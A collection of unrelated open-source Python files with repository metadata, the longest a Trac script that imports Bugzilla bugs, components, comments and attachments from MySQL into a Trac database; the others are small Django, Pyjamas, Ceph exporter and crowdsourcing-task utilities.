def _gen_FS_templates(l, template_dirs=settings.TEMPLATE_DIRS):
"""
Generator. Takes a filesystem loader, and yields paths to the templates for it.
"""
for template_dir in template_dirs:
logging.info('Looking in template directory %r' % template_dir)
for path, dirs, files in os.walk(template_dir, followlinks=True):
for f in files:
abs_path = os.path.join(path, f)
rel_path = abs_path[len(template_dir):]
if rel_path[0] == '/':
rel_path = rel_path[1:]
logging.info('Found template %r' % rel_path)
yield (rel_path, abs_path)
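# Illustrative usage sketch (added example, not part of the original module):
# `_print_all_templates` is a hypothetical helper that simply logs every
# template path found through the configured loaders.
def _print_all_templates():
    for rel_path, abs_path in gen_all_templates():
        logging.info('%s (%s)' % (rel_path, abs_path))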
|
craigds/django-tc
|
tc/loading.py
|
Python
|
mit
| 2,724
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: LiSnB
# @Date: 2014-06-06 19:32:15
# @Last Modified by: LiSnB
# @Last Modified time: 2014-06-06 19:32:15
# @Email: lisnb.h@gmail.com
"""
# @comment here:
"""
if __name__ == '__main__':
pass
|
lisnb/intelliSeg
|
mm/__init__.py
|
Python
|
mit
| 293
|
# -*- mode: python, coding: utf-8 -*-
# Copyright © 2016 by Jeffrey C. Ollie
#
# This file is part of ceph_exporter.
#
# ceph_exporter is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# ceph_exporter is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ceph_exporter. If not, see
# <http://www.gnu.org/licenses/>.
from ...prometheus import Metric
__all__ = ['ceph']
ceph_pg_state = Metric('ceph_pg_state', None, 'gauge')
|
jcollie/ceph_exporter
|
ceph_exporter/ceph/metrics/ceph_pg_state.py
|
Python
|
gpl-3.0
| 870
|
# Copyright (C) 2009 Luke Kenneth Casson Leighton <lkcl@lkcl.net>
#
# Pyjamas Widget Factory. register widgets with this module,
# for dynamic use in applications. please observe namespaces.
#
# * pyjamas.ui namespace is used for widgets in library/pyjamas/ui
#from __pyjamas__ import doc
from pyjamas import log
from pyjamas import DOM
factory = {}
def registerClass(modname, klsname, kls):
global factory
if modname is None:
modname = '.'.join(['pyjamas.ui', klsname])
name = '.'.join([modname, klsname])
factory[name] = kls
def lookupClass(name):
return factory[name]
def createWidgetOnElement(element):
fc = DOM.getAttribute(element, 'id')
lbr = fc.find("(")
klsname = fc[:lbr]
txtargs = fc[lbr+1:-1]
args = []
kwargs = {}
for arg in txtargs.split(','):
findeq = arg.find('=')
if findeq == -1:
args.append(arg)
else:
k = arg[:findeq]
v = arg[findeq+1:]
if ((v[0] == "'" and v[-1] == "'") or
(v[0] == '"' and v[-1] == '"')):
# string - strip quotes
v = v[1:-1]
else:
# assume it's an int
v = int(v)
kwargs[k] = v
kwargs['Element'] = element
return lookupClass(klsname)(*args, **kwargs)
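# Added descriptive comment (illustrative, the element id is hypothetical):
# an element whose id attribute is "pyjamas.ui.Label.Label(Hello,StyleName='big')"
# is parsed above into klsname = "pyjamas.ui.Label.Label", args = ["Hello"] and
# kwargs = {"StyleName": "big", "Element": element}, and the class registered
# under that name is instantiated with those arguments.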
def addPyjamasNameSpace():
doc().createElementNS("urn:schemas-pyjs-org:pyjs")
#try:
# ns = doc().namespaces.item("pyjs")
#except:
# doc().namespaces.add("pyjsinit", "urn:schemas-pyjs-org:pyjs")
#doc().createStyleSheet().cssText = "v\\:*{behavior:url(#default#VML);}"
|
anandology/pyjamas
|
library/pyjamas/Factory.py
|
Python
|
apache-2.0
| 1,645
|
#!/usr/bin/env python
"""
Create input tasks for 2010-2013 pad delineator
"""
import argparse
import json
import os
import time
from pprint import pprint
import sys
def get_classification(task_runs):
"""
Determine task run's classification based on the crowd's response
Returns
-------
str
Classification
"""
output = None
responses = {}
for tr in task_runs:
selection = tr['info']['selection']
if selection in responses:
responses[selection] += 1
else:
responses[selection] = 1
max_selection = max(responses.values())
for resp, count in responses.items():
# The output has not been set yet and the count for this response matches the maximum number of counts
if output is None and count == max_selection:
output = resp
# The output has already been set, which means that there are at least two responses that tied for first place
# Only one of these occurred in the Tadpole tasks so just return None
elif output is not None and count == max_selection:
return None
return output
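# Illustrative sketch (not part of the original script): a hypothetical set of
# task runs in which 'pad' wins the crowd vote 2 to 1, so get_classification()
# returns 'pad'; a 2-2 tie would make it return None instead. The helper is
# never called - it only documents the expected behaviour.
def _example_get_classification():
    sample_task_runs = [
        {'info': {'selection': 'pad'}},
        {'info': {'selection': 'pad'}},
        {'info': {'selection': 'empty'}},
    ]
    assert get_classification(sample_task_runs) == 'pad'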
def main(args):
# Parse arguments
parser = argparse.ArgumentParser(description="Create input tasks for OH pad delineator 2010-2013")
parser.add_argument(
'input_tasks', metavar='task.json', help="Input task.json")
parser.add_argument(
'input_task_runs', metavar='Input task_run.json')
parser.add_argument(
'output_tasks', metavar='output-tasks.json', help="Output task file")
parser.add_argument(
'--overwrite', default=False, action='store_true')
pargs = parser.parse_args(args=args)
# Validate
if not os.access(pargs.input_tasks, os.R_OK):
print("ERROR: Can't find input tasks: {}".format(pargs.input_tasks))
return 1
elif not os.access(pargs.input_task_runs, os.R_OK):
print("ERROR: Can't find input task runs: {}".format(pargs.input_task_runs))
return 1
elif not pargs.overwrite and os.path.isfile(pargs.output_tasks):
print("ERROR: Output file exists and overwrite={0}: {1}".format(pargs.overwrite, pargs.output_tasks))
return 1
# Cache files and index by ID
with open(pargs.input_tasks) as f:
tasks = json.load(f)
with open(pargs.input_task_runs) as f:
task_runs = json.load(f)
# Index tasks by task ID so that {task_id: [task1, t2, ...]}
input_tasks = {}
for task in tasks:
tid = task['id']
if tid in input_tasks:
input_tasks[tid].append(task)
else:
input_tasks[tid] = [task]
# Index task runs by task ID so that {task_id: [run1, run2, ...]}
input_task_runs = {}
for tr in task_runs:
tid = tr['task_id']
if tid in input_task_runs:
input_task_runs[tid].append(tr)
else:
input_task_runs[tid] = [tr]
# Container for all output tasks
output_tasks = []
# Process all site ID's in the input_tasks (task.json)
progress_total = len(input_tasks)
progress_i = 0
num_output_tasks = 0
print("Processing site ID's ...")
for tid, tasks in input_tasks.items():
progress_i += 1
sys.stdout.write("\r\x1b[K" + " {0}/{1}".format(progress_i, progress_total))
sys.stdout.flush()
if progress_i >= progress_total:
sys.stdout.write(os.linesep)
# Sort the associated tasks in year order
ordered_tasks = []
_tasks = {int(t['info']['year']): t for t in tasks}
for y in sorted(_tasks.keys()):
ordered_tasks.append(_tasks[y])
# Write each task in sorted order
for task in ordered_tasks:
classification = get_classification([tr for tr in input_task_runs[tid] if tr['task_id'] == tid])
if classification is not None and classification.lower() == 'pad':
num_output_tasks += 1
# Strip off all the non-required fields
otask = {'info': task['info'].copy()}
# Task modifications
del otask['info']['options']
del otask['info']['url']
otask['info']['question'] = 'Please drag on the edges of the shape to make it fit the drill pad you see in the satellite image'
# The first two API's are duplicates - force a unique list
otask['info']['apis'] = json.dumps(list(set(json.loads(task['info']['apis']))))
otask['info']['imagery'] = [
{
'options': {
'layers': '06136759344167181854-11275828430006462017-4'
},
'title': '2013',
'type': 'WMS',
'url': 'https://mapsengine.google.com/06136759344167181854-11845109403981099587-4/wms/'
},
{
'options': {
'layers': '06136759344167181854-08224624193234342065-4'
},
'title': '2011',
'type': 'WMS',
'url': 'https://mapsengine.google.com/06136759344167181854-11845109403981099587-4/wms/'
},
{
'options': {
'layers': '06136759344167181854-04770958895915995837-4'
},
'title': '2010',
'type': 'WMS',
'url': 'https://mapsengine.google.com/06136759344167181854-11845109403981099587-4/wms/'
}
]
# The user is supposed to digitize against a specific year. Make sure the imagery block for that year
# contains a key called 'active' that is set to `True'
for idx, imagery_tag in enumerate(otask.copy()['info']['imagery']):
if str(imagery_tag['title']) == str(task['info']['year']):
imagery_tag['active'] = True
otask['info']['imagery'][idx] = imagery_tag
output_tasks.append(otask)
# Done processing - print report
with open(pargs.output_tasks, 'w') as f:
json.dump(output_tasks, f)
print("Wrote {} output tasks".format(num_output_tasks))
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
SkyTruth/CrowdProjects
|
Data/FrackFinder/OH/2010-2013/Pad-Delineator/bin/create_input_tasks.py
|
Python
|
bsd-3-clause
| 6,510
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.editor, name="editor"),
url(r'^game/$', views.edit_game, name="add_game"),
url(r'^game/(?P<gameid>\d+)/$', views.edit_game, name="edit_game"),
url(r'^event/$', views.edit_event, name="add_event"),
url(r'^event/(?P<evid>\d+)/$', views.edit_event, name="edit_event"),
url(r'^ajax/player/$', views.ajax_player_search, name="ajax_player_search"),
url(r'^api/game/(?P<game_id>\d+)/$', views.gameview, name='get_game'),
url(r'^api/game/$', views.gameview, name='new_game'),
url(r'^api/games/$', views.gamelist, name='get_games'),
url(r'^api/ev/(?P<ev_id>\d+)/$', views.evview, name='get_ev'),
url(r'^api/ev/$', views.evview, name='new_ev'),
]
|
wadobo/socializa
|
backend/editor/urls.py
|
Python
|
agpl-3.0
| 775
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2004-2019 Edgewall Software
# Copyright (C) 2004 Dmitry Yusupov <dmitry_yus@yahoo.com>
# Copyright (C) 2004 Mark Rowe <mrowe@bluewire.net.nz>
# Copyright (C) 2005 Bill Soudan <bill@soudan.net>
# Copyright (C) 2005 Florent Guillaume <fg@nuxeo.com>
# Copyright (C) 2005 Jeroen Ruigrok van der Werven <asmodai@in-nomine.org>
# Copyright (C) 2010 Jeff Moreland <hou5e@hotmail.com>
#
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/.
"""
Import Bugzilla items into a Trac database.
Requires: Trac 0.9b1 from http://trac.edgewall.org/
Python 2.3 from http://www.python.org/
MySQL >= 3.23 from http://www.mysql.org/
or PostgreSQL 8.4 from http://www.postgresql.org/
or SQLite 3 from http://www.sqlite.org/
$Id$
"""
import re
###
### Conversion Settings -- edit these before running if desired
###
# Bugzilla version. You can find this in Bugzilla's globals.pl file.
#
# Currently, the following bugzilla versions are known to work:
# 2.11 (2110), 2.16.5 (2165), 2.16.7 (2167), 2.18.3 (2183), 2.19.1 (2191),
# 2.23.3 (2233), 3.04.4 (3044)
#
# If you run this script on a version not listed here and it is successful,
# please file a ticket at http://trac.edgewall.org
#
BZ_VERSION = 3044
# MySQL connection parameters for the Bugzilla database. These can also
# be specified on the command line.
BZ_DB = ""
BZ_HOST = ""
BZ_USER = ""
BZ_PASSWORD = ""
# Path to the Trac environment.
TRAC_ENV = "/usr/local/trac"
# If true, all existing Trac tickets and attachments will be removed
# prior to import.
TRAC_CLEAN = True
# Enclose imported ticket description and comments in a {{{ }}}
# preformat block? This formats the text in a fixed-point font.
PREFORMAT_COMMENTS = False
# Replace bug numbers in comments with #xyz
REPLACE_BUG_NO = False
# Severities
SEVERITIES = [
("blocker", "1"),
("critical", "2"),
("major", "3"),
("normal", "4"),
("minor", "5"),
("trivial", "6")
]
# Priorities
# If using the default Bugzilla priorities of P1 - P5, do not change anything
# here.
# If you have other priorities defined please change the P1 - P5 mapping to
# the order you want. You can also collapse multiple priorities on bugzilla's
# side into the same priority on Trac's side, simply adjust PRIORITIES_MAP.
PRIORITIES = [
("highest", "1"),
("high", "2"),
("normal", "3"),
("low", "4"),
("lowest", "5")
]
# Bugzilla: Trac
# NOTE: Use lowercase.
PRIORITIES_MAP = {
"p1": "highest",
"p2": "high",
"p3": "normal",
"p4": "low",
"p5": "lowest"
}
# By default, all bugs are imported from Bugzilla. If you add a list
# of products here, only bugs from those products will be imported.
PRODUCTS = []
# These Bugzilla products will be ignored during import.
IGNORE_PRODUCTS = []
# These milestones are ignored
IGNORE_MILESTONES = ["---"]
# Don't import user names and passwords into htpassword if
# user is disabled in bugzilla? (i.e. profiles.DisabledText<>'')
IGNORE_DISABLED_USERS = True
# These logins are converted to these user ids
LOGIN_MAP = {
#'some.user@example.com': 'someuser',
}
# These emails are removed from CC list
IGNORE_CC = [
#'loser@example.com',
]
# The 'component' field in Trac can come either from the Product or
# from the Component field of Bugzilla. COMPONENTS_FROM_PRODUCTS
# switches the behavior.
# If COMPONENTS_FROM_PRODUCTS is True:
# - Bugzilla Product -> Trac Component
# - Bugzilla Component -> Trac Keyword
# IF COMPONENTS_FROM_PRODUCTS is False:
# - Bugzilla Product -> Trac Keyword
# - Bugzilla Component -> Trac Component
COMPONENTS_FROM_PRODUCTS = False
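# Added illustrative note: with the default False setting, a Bugzilla bug filed
# under product "Browser" / component "Bookmarks" becomes a Trac ticket whose
# component is "Bookmarks", and "Browser" can only be carried over as a ticket
# keyword via KEYWORDS_MAPPING below; setting the flag to True swaps the roles.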
# If COMPONENTS_FROM_PRODUCTS is True, the default owner for each
# Trac component is inferred from a default Bugzilla component.
DEFAULT_COMPONENTS = ["default", "misc", "main"]
# This mapping can assign keywords in the ticket entry to represent
# products or components (depending on COMPONENTS_FROM_PRODUCTS).
# The keyword will be ignored if empty.
KEYWORDS_MAPPING = {
#'Bugzilla_product_or_component': 'Keyword',
"default": "",
"misc": "",
}
# If this is True, products or components are all set as keywords
# even if not mentioned in KEYWORDS_MAPPING.
MAP_ALL_KEYWORDS = True
# Custom field mappings
CUSTOMFIELD_MAP = {
#'Bugzilla_field_name': 'Trac_customfield_name',
#'op_sys': 'os',
#'cf_featurewantedby': 'wanted_by',
#'product': 'product'
}
# Bug comments that should not be imported. Each entry in list should
# be a regular expression.
IGNORE_COMMENTS = [
"^Created an attachment \(id="
]
###########################################################################
### You probably don't need to change any configuration past this line. ###
###########################################################################
# Bugzilla status to Trac status translation map.
#
# NOTE: bug activity is translated as well, which may cause bug
# activity to be deleted (e.g. resolved -> closed in Bugzilla
# would translate into closed -> closed in Trac, so we just ignore the
# change).
#
# There is some special magic for open in the code: if there is no
# Bugzilla owner, open is mapped to 'new' instead.
STATUS_TRANSLATE = {
"unconfirmed": "new",
"open": "assigned",
"resolved": "closed",
"verified": "closed",
"released": "closed"
}
# Translate Bugzilla statuses into Trac keywords. This provides a way
# to retain the Bugzilla statuses in Trac. e.g. when a bug is marked
# 'verified' in Bugzilla it will be assigned a VERIFIED keyword.
STATUS_KEYWORDS = {
"verified": "VERIFIED",
"released": "RELEASED"
}
# Some fields in Bugzilla do not have equivalents in Trac. Changes in
# fields listed here will not be imported into the ticket change history,
# otherwise you'd see changes for fields that don't exist in Trac.
IGNORED_ACTIVITY_FIELDS = ["everconfirmed"]
# Regular expression and its replacement
# this expression will update references to bugs 1 - 99999 that
# have the form "bug 1" or "bug #1"
BUG_NO_RE = re.compile(r"\b(bug #?)([0-9]{1,5})\b", re.I)
BUG_NO_REPL = r"#\2"
###
### Script begins here
###
import io
import os
import sys
import string
import pymysql
from trac.attachment import Attachment
from trac.env import Environment
if not hasattr(sys, 'setdefaultencoding'):
reload(sys)
sys.setdefaultencoding('latin1')
# simulated Attachment class for trac.add
#class Attachment:
# def __init__(self, name, data):
# self.filename = name
# self.file = io.BytesIO(data.tostring())
# simple field translation mapping. if string not in
# mapping, just return string, otherwise return value
class FieldTranslator(dict):
def __getitem__(self, item):
if item not in self:
return item
return dict.__getitem__(self, item)
statusXlator = FieldTranslator(STATUS_TRANSLATE)
class TracDatabase(object):
def __init__(self, path):
self.env = Environment(path)
self.loginNameCache = {}
self.fieldNameCache = {}
from trac.db.api import DatabaseManager
self.using_postgres = \
DatabaseManager(self.env).connection_uri.startswith("postgres:")
def hasTickets(self):
return int(self.env.db_query("SELECT count(*) FROM ticket")[0][0] > 0)
def assertNoTickets(self):
if self.hasTickets():
raise Exception("Will not modify database with existing tickets!")
def setSeverityList(self, s):
"""Remove all severities, set them to `s`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM enum WHERE type='severity'")
for value, i in s:
print(" inserting severity '%s' - '%s'" % (value, i))
db("""INSERT INTO enum (type, name, value)
VALUES (%s, %s, %s)""",
("severity", value, i))
def setPriorityList(self, s):
"""Remove all priorities, set them to `s`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM enum WHERE type='priority'")
for value, i in s:
print(" inserting priority '%s' - '%s'" % (value, i))
db("INSERT INTO enum (type, name, value) VALUES (%s, %s, %s)",
("priority", value, i))
def setComponentList(self, l, key):
"""Remove all components, set them to `l`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM component")
for comp in l:
print(" inserting component '%s', owner '%s'"
% (comp[key], comp['owner']))
db("INSERT INTO component (name, owner) VALUES (%s, %s)",
(comp[key], comp['owner']))
def setVersionList(self, v, key):
"""Remove all versions, set them to `v`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM version")
for vers in v:
print(" inserting version '%s'" % vers[key])
db("INSERT INTO version (name) VALUES (%s)",
(vers[key],))
def setMilestoneList(self, m, key):
"""Remove all milestones, set them to `m`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM milestone")
for ms in m:
milestone = ms[key]
print(" inserting milestone '%s'" % milestone)
db("INSERT INTO milestone (name) VALUES (%s)",
(milestone,))
def addTicket(self, id, time, changetime, component, severity, priority,
owner, reporter, cc, version, milestone, status, resolution,
summary, description, keywords, customfields):
desc = description
type = "defect"
if SEVERITIES:
if severity.lower() == "enhancement":
severity = "minor"
type = "enhancement"
else:
if priority.lower() == "enhancement":
priority = "minor"
type = "enhancement"
if PREFORMAT_COMMENTS:
desc = '{{{\n%s\n}}}' % desc
if REPLACE_BUG_NO:
if BUG_NO_RE.search(desc):
desc = re.sub(BUG_NO_RE, BUG_NO_REPL, desc)
if priority in PRIORITIES_MAP:
priority = PRIORITIES_MAP[priority]
print(" inserting ticket %s -- %s" % (id, summary))
with self.env.db_transaction as db:
db("""INSERT INTO ticket (id, type, time, changetime, component,
severity, priority, owner, reporter, cc,
version, milestone, status, resolution,
summary, description, keywords)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,
%s, %s, %s, %s)
""", (id, type, datetime2epoch(time),
datetime2epoch(changetime), component, severity,
priority, owner, reporter, cc, version, milestone,
status.lower(), resolution, summary, desc, keywords))
if self.using_postgres:
with self.env.db_transaction as db:
c = db.cursor()
c.execute("""
SELECT SETVAL('ticket_id_seq', MAX(id)) FROM ticket;
SELECT SETVAL('report_id_seq', MAX(id)) FROM report""")
ticket_id = db.get_last_id(c, 'ticket')
# add all custom fields to ticket
for name, value in customfields.iteritems():
self.addTicketCustomField(ticket_id, name, value)
return ticket_id
def addTicketCustomField(self, ticket_id, field_name, field_value):
if field_value is None:
return
self.env.db_transaction("""
INSERT INTO ticket_custom (ticket, name, value) VALUES (%s, %s, %s)
""", (ticket_id, field_name, field_value))
def addTicketComment(self, ticket, time, author, value):
comment = value
if PREFORMAT_COMMENTS:
comment = '{{{\n%s\n}}}' % comment
if REPLACE_BUG_NO:
if BUG_NO_RE.search(comment):
comment = re.sub(BUG_NO_RE, BUG_NO_REPL, comment)
with self.env.db_transaction as db:
db("""INSERT INTO ticket_change (ticket, time, author, field,
oldvalue, newvalue)
VALUES (%s, %s, %s, %s, %s, %s)
""", (ticket, datetime2epoch(time), author, 'comment', '',
comment))
def addTicketChange(self, ticket, time, author, field, oldvalue, newvalue):
if field == "owner":
if oldvalue in LOGIN_MAP:
oldvalue = LOGIN_MAP[oldvalue]
if newvalue in LOGIN_MAP:
newvalue = LOGIN_MAP[newvalue]
if field == "priority":
if oldvalue.lower() in PRIORITIES_MAP:
oldvalue = PRIORITIES_MAP[oldvalue.lower()]
if newvalue.lower() in PRIORITIES_MAP:
newvalue = PRIORITIES_MAP[newvalue.lower()]
# Doesn't make sense if we go from highest -> highest, for example.
if oldvalue == newvalue:
return
with self.env.db_transaction as db:
db("""INSERT INTO ticket_change (ticket, time, author, field,
oldvalue, newvalue)
VALUES (%s, %s, %s, %s, %s, %s)
""", (ticket, datetime2epoch(time), author, field,
oldvalue, newvalue))
def addAttachment(self, author, a):
if a['filename'] != '':
description = a['description']
id = a['bug_id']
filename = a['filename']
filedata = io.BytesIO(a['thedata'])
filesize = len(filedata.getvalue())
time = a['creation_ts']
print(" ->inserting attachment '%s' for ticket %s -- %s"
% (filename, id, description))
attachment = Attachment(self.env, 'ticket', id)
attachment.author = author
attachment.description = description
attachment.insert(filename, filedata, filesize,
datetime2epoch(time))
del attachment
def getLoginName(self, cursor, userid):
if userid not in self.loginNameCache:
cursor.execute("SELECT * FROM profiles WHERE userid = %s", userid)
loginName = cursor.fetchall()
if loginName:
loginName = loginName[0]['login_name']
else:
print("WARNING: unknown bugzilla userid %d, recording as"
" anonymous" % userid)
loginName = "anonymous"
loginName = LOGIN_MAP.get(loginName, loginName)
self.loginNameCache[userid] = loginName
return self.loginNameCache[userid]
def getFieldName(self, cursor, fieldid):
if fieldid not in self.fieldNameCache:
# fielddefs.fieldid got changed to fielddefs.id in Bugzilla
# 2.23.3.
if BZ_VERSION >= 2233:
cursor.execute("SELECT * FROM fielddefs WHERE id = %s",
fieldid)
else:
cursor.execute("SELECT * FROM fielddefs WHERE fieldid = %s",
fieldid)
fieldName = cursor.fetchall()
if fieldName:
fieldName = fieldName[0]['name'].lower()
else:
print("WARNING: unknown bugzilla fieldid %d, "
" recording as unknown" % fieldid)
fieldName = "unknown"
self.fieldNameCache[fieldid] = fieldName
return self.fieldNameCache[fieldid]
def makeWhereClause(fieldName, values, negative=False):
if not values:
return ''
if negative:
connector, op = ' AND ', '!='
else:
connector, op = ' OR ', '='
clause = connector.join("%s %s '%s'" % (fieldName, op, value)
for value in values)
return ' (' + clause + ')'
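# Illustrative examples of the helper above (added comment):
#   makeWhereClause('p.name', ['Foo', 'Bar']) -> " (p.name = 'Foo' OR p.name = 'Bar')"
#   makeWhereClause('value', ['---'], negative=True) -> " (value != '---')"
#   makeWhereClause('p.name', []) -> ""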
def convert(_db, _host, _user, _password, _env, _force):
activityFields = FieldTranslator()
# account for older versions of bugzilla
print("Using Bugzilla v%s schema." % BZ_VERSION)
if BZ_VERSION == 2110:
activityFields['removed'] = "oldvalue"
activityFields['added'] = "newvalue"
# init Bugzilla environment
print("Bugzilla MySQL('%s':'%s':'%s':'%s'): connecting..."
% (_db, _host, _user, ("*" * len(_password))))
mysql_con = pymysql.connect(host=_host,
user=_user, passwd=_password, db=_db, compress=1,
cursorclass=pymysql.cursors.DictCursor,
charset='utf8')
mysql_cur = mysql_con.cursor()
# init Trac environment
print("Trac SQLite('%s'): connecting..." % _env)
trac = TracDatabase(_env)
# force mode...
if _force == 1:
print("\nCleaning all tickets...")
with trac.env.db_transaction as db:
db("DELETE FROM ticket_change")
db("DELETE FROM ticket")
db("DELETE FROM ticket_custom")
db("DELETE FROM attachment")
# Straight from the Python documentation.
for root, dirs, files in os.walk(trac.env.attachments_dir,
topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
if not os.stat(trac.env.attachments_dir):
os.mkdir(trac.env.attachments_dir)
print("All tickets cleaned...")
print("\n0. Filtering products...")
if BZ_VERSION >= 2180:
mysql_cur.execute("SELECT name FROM products")
else:
mysql_cur.execute("SELECT product AS name FROM products")
products = []
for line in mysql_cur.fetchall():
product = line['name']
if PRODUCTS and product not in PRODUCTS:
continue
if product in IGNORE_PRODUCTS:
continue
products.append(product)
PRODUCTS[:] = products
print(" Using products", " ".join(PRODUCTS))
print("\n1. Import severities...")
trac.setSeverityList(SEVERITIES)
print("\n2. Import components...")
if not COMPONENTS_FROM_PRODUCTS:
if BZ_VERSION >= 2180:
sql = """SELECT DISTINCT c.name AS name, c.initialowner AS owner
FROM components AS c, products AS p
WHERE c.product_id = p.id AND"""
sql += makeWhereClause('p.name', PRODUCTS)
else:
sql = "SELECT value AS name, initialowner AS owner FROM components"
sql += " WHERE" + makeWhereClause('program', PRODUCTS)
mysql_cur.execute(sql)
components = mysql_cur.fetchall()
for component in components:
component['owner'] = trac.getLoginName(mysql_cur,
component['owner'])
trac.setComponentList(components, 'name')
else:
if BZ_VERSION >= 2180:
sql = ("SELECT p.name AS product, c.name AS comp, "
" c.initialowner AS owner "
"FROM components c, products p "
"WHERE c.product_id = p.id AND" +
makeWhereClause('p.name', PRODUCTS))
else:
sql = ("SELECT program AS product, value AS comp, "
" initialowner AS owner "
"FROM components WHERE" +
makeWhereClause('program', PRODUCTS))
mysql_cur.execute(sql)
lines = mysql_cur.fetchall()
all_components = {} # product -> components
all_owners = {} # product, component -> owner
for line in lines:
product = line['product']
comp = line['comp']
owner = line['owner']
all_components.setdefault(product, []).append(comp)
all_owners[(product, comp)] = owner
component_list = []
for product, components in all_components.items():
# find best default owner
default = None
for comp in DEFAULT_COMPONENTS:
if comp in components:
default = comp
break
if default is None:
default = components[0]
owner = all_owners[(product, default)]
owner_name = trac.getLoginName(mysql_cur, owner)
component_list.append({'product': product, 'owner': owner_name})
trac.setComponentList(component_list, 'product')
print("\n3. Import priorities...")
trac.setPriorityList(PRIORITIES)
print("\n4. Import versions...")
if BZ_VERSION >= 2180:
sql = """SELECT DISTINCTROW v.value AS value
FROM products p, versions v"""
sql += " WHERE v.product_id = p.id AND"
sql += makeWhereClause('p.name', PRODUCTS)
else:
sql = "SELECT DISTINCTROW value FROM versions"
sql += " WHERE" + makeWhereClause('program', PRODUCTS)
mysql_cur.execute(sql)
versions = mysql_cur.fetchall()
trac.setVersionList(versions, 'value')
print("\n5. Import milestones...")
sql = "SELECT DISTINCT value FROM milestones"
sql += " WHERE" + makeWhereClause('value', IGNORE_MILESTONES, negative=True)
mysql_cur.execute(sql)
milestones = mysql_cur.fetchall()
trac.setMilestoneList(milestones, 'value')
print("\n6. Retrieving bugs...")
if BZ_VERSION >= 2180:
sql = """SELECT DISTINCT b.*, c.name AS component, p.name AS product
FROM bugs AS b, components AS c, products AS p """
sql += " WHERE" + makeWhereClause('p.name', PRODUCTS)
sql += " AND b.product_id = p.id"
sql += " AND b.component_id = c.id"
sql += " ORDER BY b.bug_id"
else:
sql = """SELECT DISTINCT b.*, c.value AS component, p.product AS product
FROM bugs AS b, components AS c, products AS p """
sql += " WHERE" + makeWhereClause('p.product', PRODUCTS)
sql += " AND b.product = p.product"
sql += " AND b.component = c.value"
sql += " ORDER BY b.bug_id"
mysql_cur.execute(sql)
bugs = mysql_cur.fetchall()
print("\n7. Import bugs and bug activity...")
for bug in bugs:
bugid = bug['bug_id']
ticket = {}
keywords = []
ticket['id'] = bugid
ticket['time'] = bug['creation_ts']
ticket['changetime'] = bug['delta_ts']
if COMPONENTS_FROM_PRODUCTS:
ticket['component'] = bug['product']
else:
ticket['component'] = bug['component']
if SEVERITIES:
ticket['severity'] = bug['bug_severity']
ticket['priority'] = bug['priority'].lower()
else:
# use bugzilla severities as trac priorities, and ignore bugzilla
# priorities
ticket['severity'] = ''
ticket['priority'] = bug['bug_severity']
ticket['owner'] = trac.getLoginName(mysql_cur, bug['assigned_to'])
ticket['reporter'] = trac.getLoginName(mysql_cur, bug['reporter'])
# pack bugzilla fields into dictionary of trac custom field
# names and values
customfields = {}
for bugfield, customfield in CUSTOMFIELD_MAP.iteritems():
customfields[customfield] = bug[bugfield]
ticket['customfields'] = customfields
mysql_cur.execute("SELECT * FROM cc WHERE bug_id = %s", bugid)
cc_records = mysql_cur.fetchall()
cc_list = []
for cc in cc_records:
cc_list.append(trac.getLoginName(mysql_cur, cc['who']))
cc_list = [cc for cc in cc_list if cc not in IGNORE_CC]
ticket['cc'] = string.join(cc_list, ', ')
ticket['version'] = bug['version']
target_milestone = bug['target_milestone']
if target_milestone in IGNORE_MILESTONES:
target_milestone = ''
ticket['milestone'] = target_milestone
bug_status = bug['bug_status'].lower()
ticket['status'] = statusXlator[bug_status]
ticket['resolution'] = bug['resolution'].lower()
# a bit of extra work to do open tickets
if bug_status == 'open':
if ticket['owner'] != '':
ticket['status'] = 'assigned'
else:
ticket['status'] = 'new'
ticket['summary'] = bug['short_desc']
mysql_cur.execute("SELECT * FROM longdescs WHERE bug_id = %s" % bugid)
longdescs = list(mysql_cur.fetchall())
# check for empty 'longdescs[0]' field...
if len(longdescs) == 0:
ticket['description'] = ''
else:
ticket['description'] = longdescs[0]['thetext']
del longdescs[0]
for desc in longdescs:
ignore = False
for comment in IGNORE_COMMENTS:
if re.match(comment, desc['thetext']):
ignore = True
if ignore:
continue
trac.addTicketComment(ticket=bugid,
time = desc['bug_when'],
author=trac.getLoginName(mysql_cur, desc['who']),
value = desc['thetext'])
mysql_cur.execute("""SELECT * FROM bugs_activity WHERE bug_id = %s
ORDER BY bug_when""" % bugid)
bugs_activity = mysql_cur.fetchall()
resolution = ''
ticketChanges = []
keywords = []
for activity in bugs_activity:
field_name = trac.getFieldName(mysql_cur, activity['fieldid']).lower()
removed = activity[activityFields['removed']]
added = activity[activityFields['added']]
# statuses and resolutions are in lowercase in trac
if field_name in ('resolution', 'bug_status'):
removed = removed.lower()
added = added.lower()
# remember most recent resolution, we need this later
if field_name == "resolution":
resolution = added.lower()
add_keywords = []
remove_keywords = []
# convert bugzilla field names...
if field_name == "bug_severity":
if SEVERITIES:
field_name = "severity"
else:
field_name = "priority"
elif field_name == "assigned_to":
field_name = "owner"
elif field_name == "bug_status":
field_name = "status"
if removed in STATUS_KEYWORDS:
remove_keywords.append(STATUS_KEYWORDS[removed])
if added in STATUS_KEYWORDS:
add_keywords.append(STATUS_KEYWORDS[added])
added = statusXlator[added]
